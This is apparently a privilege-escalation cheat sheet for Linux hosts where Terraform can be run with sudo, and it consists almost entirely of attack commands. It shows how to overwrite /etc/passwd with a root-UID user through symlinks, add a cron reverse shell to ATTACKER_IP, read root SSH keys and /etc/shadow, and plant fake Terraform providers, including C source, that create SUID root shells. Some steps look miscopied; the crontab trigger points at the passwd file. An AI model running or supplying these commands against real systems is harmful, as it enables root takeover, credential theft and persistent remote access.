# Generate MD5 password hash
openssl passwd -1 abcd1234
# Example output: $1$xyz$abc123...
# Create malicious passwd file
mkdir -p /tmp/root/examples
cat /etc/passwd > /tmp/root/examples/passwd
echo 'strikoder:$1$xyz$abc123...:0:0:root:/root:/bin/bash' >> /tmp/root/examples/passwd
# Create symlink in Terraform's output directory (e.g., docker/public)
ln -s /etc/passwd /home/jeremy/docker/previous/public/examples/passwd #terraform destination path
# Trigger with sudo terraform - it copies from /tmp/root/examples/passwd to the symlink
TF_VAR_source_path=/tmp/root/examples/passwd sudo /usr/bin/terraform -chdir=/opt/examples apply
# After execution: su strikoder# Craft malicious crontab
cat /etc/crontab > /tmp/root/examples/crontab
echo '* * * * * root /bin/bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"' >> /tmp/root/examples/crontab
# Create symlink
ln -s /etc/crontab /home/jeremy/docker/previous/public/examples/crontab #destination path
# Trigger with terraform - reverse shell every minute
TF_VAR_source_path=/tmp/root/examples/passwd sudo /usr/bin/terraform -chdir=/opt/examples apply
Read files normally restricted to root (SSH keys, shadow file, etc.)
mkdir -p /tmp/root/examples
# Symlink to target file
ln -s /root/.ssh/id_rsa /tmp/root/examples/key # or ln -s /etc/shadow /tmp/root/examples/shadow
# Configure Terraform to read the symlinked file
TF_VAR_source_path=/tmp/root/examples/key sudo terraform apply
cat output_file_in_destination_path # check destination_pathHijack Terraform's provider mechanism to execute arbitrary code as root.
# Create malicious provider
cat > terraform-provider-example << 'EOF'
#!/bin/bash
cp /bin/bash /tmp/rootshell
chmod +s /tmp/rootshell
EOF
chmod +x terraform-provider-example
# Option A: Via .terraformrc configuration
mkdir -p ~/.terraform.d/plugins
mv terraform-provider-example ~/.terraform.d/plugins/
cat > ~/.terraformrc << 'EOF'
provider_installation {
filesystem_mirror {
path = "/home/USER/.terraform.d/plugins"
}
}
EOF
# Option B: Via environment variable
export TF_CLI_CONFIG_FILE="/path/to/malicious/config"
# Trigger execution
sudo terraform init
sudo terraform apply
# Execute SUID shell
/tmp/rootshell -pMore sophisticated provider hijacking using compiled binary.
// exploit.c
#include <stdlib.h>
#include <unistd.h>
int main() {
setuid(0);
setgid(0);
system("cp /bin/bash /tmp/rootbash");
system("chmod +s /tmp/rootbash");
return 0;
}# Compile as fake provider
gcc exploit.c -o terraform-provider-example
chmod +x terraform-provider-example
# Place in provider directory
mkdir -p /tmp/malicious-plugins
mv terraform-provider-example /tmp/malicious-plugins/
# Execute with terraform
sudo /usr/bin/terraform -chdir=/opt/examples init
sudo /usr/bin/terraform -chdir=/opt/examples apply
# Use SUID shell
/tmp/rootbash -p